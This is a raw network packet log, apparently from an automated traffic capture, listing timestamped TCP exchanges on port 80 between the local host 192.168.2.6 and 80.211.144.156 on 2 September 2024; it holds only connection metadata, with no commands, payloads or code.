                                                            Sep 2, 2024 13:33:56.417265892 CEST4976080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:56.423636913 CEST804976080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:56.784929991 CEST4976080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:56.789880037 CEST804976080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:57.072036028 CEST804976080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:57.118483067 CEST4976080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:57.196912050 CEST804976080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:57.410520077 CEST804976080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:57.414153099 CEST4976080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:57.876836061 CEST4976080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:57.878232002 CEST4976180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:57.882137060 CEST804976080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:57.882186890 CEST4976080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:57.883537054 CEST804976180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:57.883599043 CEST4976180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:57.883791924 CEST4976180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:57.895859957 CEST804976180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:58.239264965 CEST4976180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:58.244508028 CEST804976180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:58.573275089 CEST804976180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:58.706664085 CEST804976180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:58.706722021 CEST4976180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:58.910197973 CEST4976180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:58.913651943 CEST4976280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:58.915632963 CEST804976180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:58.916609049 CEST4976180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:58.918452024 CEST804976280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:58.918642044 CEST4976280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:58.918984890 CEST4976280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:58.933070898 CEST804976280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:59.282171011 CEST4976280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:59.287175894 CEST804976280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:59.592603922 CEST804976280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:59.666799068 CEST4976380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:59.671653986 CEST804976380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:59.671797037 CEST4976380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:59.672164917 CEST4976380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:33:59.677092075 CEST804976380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:59.724842072 CEST804976280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:33:59.725199938 CEST4976280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:00.300123930 CEST4976380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:00.304996014 CEST804976380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:00.305196047 CEST804976380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:00.319933891 CEST804976380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:00.384072065 CEST4976380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:00.658447981 CEST4976280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:00.659754992 CEST4976480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:00.663841963 CEST804976280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:00.663904905 CEST4976280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:00.664618969 CEST804976480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:00.664691925 CEST4976480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:00.664923906 CEST4976480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:00.670003891 CEST804976480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:00.938582897 CEST804976380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:01.009216070 CEST4976480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:01.014240026 CEST804976480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:01.035878897 CEST4976380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:01.319756985 CEST804976480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:01.384083986 CEST4976480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:01.447962999 CEST804976480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:01.571372032 CEST4976380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:01.571841002 CEST4976480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:01.572845936 CEST4976580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:01.576874018 CEST804976380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:01.576927900 CEST4976380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:01.577487946 CEST804976480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:01.577593088 CEST4976480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:01.577651024 CEST804976580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:01.577976942 CEST4976580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:01.578176022 CEST4976580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:01.583297014 CEST804976580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:01.931812048 CEST4976580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:01.936733961 CEST804976580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:02.252561092 CEST804976580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:02.384099960 CEST804976580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:02.384227991 CEST4976580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:02.513851881 CEST4976680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:02.519049883 CEST804976680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:02.519130945 CEST4976680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:02.519371986 CEST4976680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:02.524276972 CEST804976680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:02.886218071 CEST4976680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:02.891228914 CEST804976680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:03.164361000 CEST804976680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:03.274724007 CEST4976680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:03.369221926 CEST804976680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:03.587217093 CEST4976680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:04.158736944 CEST4976680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:04.159760952 CEST4976880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:04.163989067 CEST804976680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:04.164057016 CEST4976680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:04.164602995 CEST804976880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:04.164707899 CEST4976880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:04.164904118 CEST4976880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:04.169758081 CEST804976880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:04.509399891 CEST4976880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:04.514219046 CEST804976880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:04.831409931 CEST804976880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:04.930938005 CEST4976880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:05.045439959 CEST804976880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:05.118467093 CEST4976880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:05.168642044 CEST4976880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:05.169079065 CEST4976980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:05.175287962 CEST804976880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:05.175303936 CEST804976980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:05.175335884 CEST4976880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:05.175379038 CEST4976980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:05.175544024 CEST4976980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:05.180361032 CEST804976980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:05.525038958 CEST4976980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:05.530312061 CEST804976980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:05.827228069 CEST804976980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:05.884105921 CEST4976980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:05.953397989 CEST804976980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:06.087225914 CEST4976980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:06.509829998 CEST4977080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:06.515081882 CEST804977080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:06.515157938 CEST4977080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:06.517075062 CEST4977080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:06.523211956 CEST804977080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:06.567430973 CEST4977180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:06.572640896 CEST804977180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:06.572727919 CEST4977180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:06.575123072 CEST4977180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:06.579924107 CEST804977180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:06.868585110 CEST4977080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:06.873532057 CEST804977080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:06.873601913 CEST804977080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:06.931066036 CEST4977180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:06.935998917 CEST804977180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:07.171248913 CEST804977080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:07.213680983 CEST804977180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:07.227829933 CEST4977080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:07.272731066 CEST4977180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:07.337285995 CEST804977180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:07.384099007 CEST4977180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:07.389738083 CEST804977080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:07.524713993 CEST4977080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:07.574723959 CEST4977080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:07.574925900 CEST4977180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:07.575453043 CEST4976980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:07.576181889 CEST4977380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:07.579931974 CEST804977080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:07.580009937 CEST4977080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:07.580610037 CEST804977180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:07.580677032 CEST4977180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:07.580950975 CEST804976980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:07.581078053 CEST804977380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:07.581126928 CEST4976980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:07.581151962 CEST4977380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:07.581300974 CEST4977380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:07.586568117 CEST804977380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:07.931277990 CEST4977380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:07.937127113 CEST804977380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:08.233108997 CEST804977380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:08.361296892 CEST804977380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:08.361352921 CEST4977380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:08.492083073 CEST4977380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:08.492986917 CEST4977480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:08.497309923 CEST804977380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:08.497369051 CEST4977380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:08.497771978 CEST804977480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:08.497849941 CEST4977480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:08.521495104 CEST4977480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:08.526535988 CEST804977480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:08.872854948 CEST4977480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:08.877809048 CEST804977480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:09.163899899 CEST804977480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:09.271574974 CEST4977480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:09.292871952 CEST804977480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:09.384151936 CEST4977480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:09.736383915 CEST4977480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:09.736910105 CEST4977680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:09.741735935 CEST804977480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:09.741811991 CEST804977680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:09.741868019 CEST4977480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:09.741883039 CEST4977680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:09.742089987 CEST4977680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:09.746949911 CEST804977680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:10.087376118 CEST4977680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:10.092345953 CEST804977680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:10.383903027 CEST804977680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:10.430977106 CEST4977680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:10.508687973 CEST804977680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:10.618479967 CEST4977680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:11.497486115 CEST4977680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:11.502829075 CEST4977780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:11.503256083 CEST804977680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:11.503356934 CEST4977680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:11.507883072 CEST804977780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:11.507963896 CEST4977780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:11.510080099 CEST4977780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:11.515069962 CEST804977780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:11.869126081 CEST4977780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:11.874089003 CEST804977780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:12.163619041 CEST804977780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:12.290340900 CEST4977780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:31.392961979 CEST804979980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:31.743793011 CEST4979980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:31.748733997 CEST804979980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:32.035018921 CEST804979980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:32.118488073 CEST4979980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:32.165390015 CEST804979980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:32.227833986 CEST4979980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:32.326987028 CEST4979980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:32.328267097 CEST4980080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:32.332380056 CEST804979980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:32.332432985 CEST4979980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:32.333241940 CEST804980080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:32.333300114 CEST4980080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:32.333511114 CEST4980080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:32.338412046 CEST804980080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:32.681128025 CEST4980080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:32.686714888 CEST804980080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:32.997924089 CEST804980080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:33.118474960 CEST4980080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:33.122889042 CEST804980080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:33.227850914 CEST4980080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:33.240118027 CEST4980080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:33.240832090 CEST4980180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:33.245379925 CEST804980080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:33.245701075 CEST804980180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:33.245801926 CEST4980180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:33.245801926 CEST4980080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:33.246026039 CEST4980180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:33.250811100 CEST804980180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:33.606214046 CEST4980180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:33.611196995 CEST804980180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:33.901288033 CEST804980180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:34.055578947 CEST804980180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:34.055658102 CEST4980180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:34.185269117 CEST4980180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:34.186913013 CEST4980280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:34.190546989 CEST804980180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:34.190618992 CEST4980180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:34.191803932 CEST804980280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:34.191864967 CEST4980280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:34.192039967 CEST4980280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:34.196882963 CEST804980280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:34.540631056 CEST4980280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:34.545591116 CEST804980280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:34.847290039 CEST804980280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:34.933219910 CEST4980280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:35.448484898 CEST4980380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:35.909945011 CEST804980280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:35.910060883 CEST804980280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:35.910108089 CEST4980280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:35.911027908 CEST804980280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:35.911070108 CEST4980280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:36.101193905 CEST4980280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:36.102694988 CEST4980480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:36.117063046 CEST804980280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:36.117117882 CEST4980280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:36.117563963 CEST804980380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:36.117647886 CEST4980380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:36.117806911 CEST4980380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:36.119483948 CEST804980480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:36.119544983 CEST4980480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:36.119663954 CEST804980280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:36.119716883 CEST4980480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:36.119716883 CEST4980280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:36.122653008 CEST804980380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:36.124492884 CEST804980480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:36.462373972 CEST4980380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:36.467273951 CEST804980380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:36.467444897 CEST804980380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:36.477982044 CEST4980480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:36.484339952 CEST804980480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:36.764698982 CEST804980380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:36.783283949 CEST804980480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:36.870456934 CEST4980380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:36.870506048 CEST4980480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:36.889368057 CEST804980380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:36.909029961 CEST804980480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:36.977860928 CEST4980480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:36.977863073 CEST4980380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:37.036190033 CEST4980380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:37.036418915 CEST4980480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:37.038208961 CEST4980580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:37.044203997 CEST804980380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:37.044266939 CEST4980380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:37.045006990 CEST804980480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:37.045075893 CEST4980480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:37.045486927 CEST804980580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:37.045571089 CEST4980580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:37.046052933 CEST4980580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:37.050892115 CEST804980580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:37.402683973 CEST4980580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:37.411257982 CEST804980580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:37.696208000 CEST804980580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:37.822103024 CEST804980580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:37.822181940 CEST4980580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:37.952419043 CEST4980580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:37.953993082 CEST4980680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:37.957717896 CEST804980580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:37.957763910 CEST4980580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:37.958797932 CEST804980680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:37.958849907 CEST4980680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:37.959026098 CEST4980680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:37.963818073 CEST804980680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:38.306097984 CEST4980680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:38.311008930 CEST804980680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:38.677062988 CEST804980680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:38.725670099 CEST804980680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:38.725725889 CEST4980680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:38.895289898 CEST4980680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:38.896404028 CEST4980780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:38.901355028 CEST804980780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:38.901437044 CEST4980780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:38.901597977 CEST4980780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:38.901742935 CEST804980680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:38.901796103 CEST4980680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:38.906435966 CEST804980780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:39.260658026 CEST4980780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:39.265619040 CEST804980780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:39.569981098 CEST804980780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:39.622217894 CEST4980780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:39.697087049 CEST804980780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:39.849308968 CEST4980780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:39.849565029 CEST4980880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:39.854311943 CEST804980880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:39.854667902 CEST804980780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:39.854698896 CEST4980880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:39.855004072 CEST4980880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:39.855509043 CEST4980780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:39.860018015 CEST804980880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:40.218219042 CEST4980880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:40.223159075 CEST804980880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:40.522284985 CEST804980880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:40.651228905 CEST804980880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:40.651294947 CEST4980880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:40.845053911 CEST4980880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:40.846987009 CEST4980980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:40.972117901 CEST804980980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:40.972131968 CEST804980880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:40.972228050 CEST4980880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:40.972228050 CEST4980980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:40.972548008 CEST4980980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:34:40.980140924 CEST804980980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:34:41.324354887 CEST4980980192.168.2.680.211.144.156
